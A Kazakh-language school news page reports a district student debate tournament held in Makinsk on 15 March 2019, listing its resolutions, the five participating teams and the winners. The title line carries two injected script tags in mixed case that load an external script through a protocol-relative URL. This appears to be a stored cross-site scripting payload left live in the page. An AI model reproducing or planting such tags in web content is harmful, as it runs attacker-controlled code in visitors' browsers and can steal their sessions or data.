Аудандық пікір-талас турнирі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.03.2019

Аудандық пікір-талас турнирі

 

         2019 жылдың 15 наурыз күні Макин Балалар шығармашылық үйінде мектеп оқушылары арасында аудандық пікір-сайыс турнирі өткізілді.

Турнирдің мақсаты: еліміздің өзекті мәселелерді қоғамдық талдау және талқылау арқылы аудандық шәкірттерінің әлеуметтік және шығармашылық белсенділігін арттырып, нақты мәселелерді шешу жолдары қарастыру.

Турнирдің қарарлары:

- Бұл палата  мектептегі енгізілген жаңартылған білім беру мазмұны өзін ақтады деп есептеді.

- Бұл палата оқушыларға ұлттық кодын енгізуінің ұтымды механизмін ұсынады.  

Турнир КПФ бойынша өткізілді. Турнирге 5 топ қатысқан. Олар Макинск                № 5 орта мектебі «Бала би» тобы, Елтай орта мектебі «Жігер» тобы, Б.Шолақ атындағы мектеп- лицейі «Алғырлар» тобы, мектеп-лицей «Аристократ» тобы, Қараөзек орта мектебі «Жарқын Болашақ» тобы.

Оқушылар өз ойларын сауатты жеткізе білді, нақты мәселелерді шешу жолдарын ұсынуға тырысты. Қорытындыға келгенде, келесі нәтижелерге келдік: 1 орынға ие болған - Макинск № 5 орта мектебі «Бала би» тобы, 2 орынға ие болған - Елтай орта мектебі «Жігер» тобы , 3 орынға ие болған -Б.Шолақ атындағы мектеп- лицейі «Алғырлар» тобы.

Балаларымызға қатысқан үшін сәттілік тілейміз.

               

«Қарым-қатынас психологиясы»

үйірмесінің жетекшісі Г.Нұрмағамбетова

Просмотров: 441


Пікір қосу



Деректерді қолтаңбаға қосу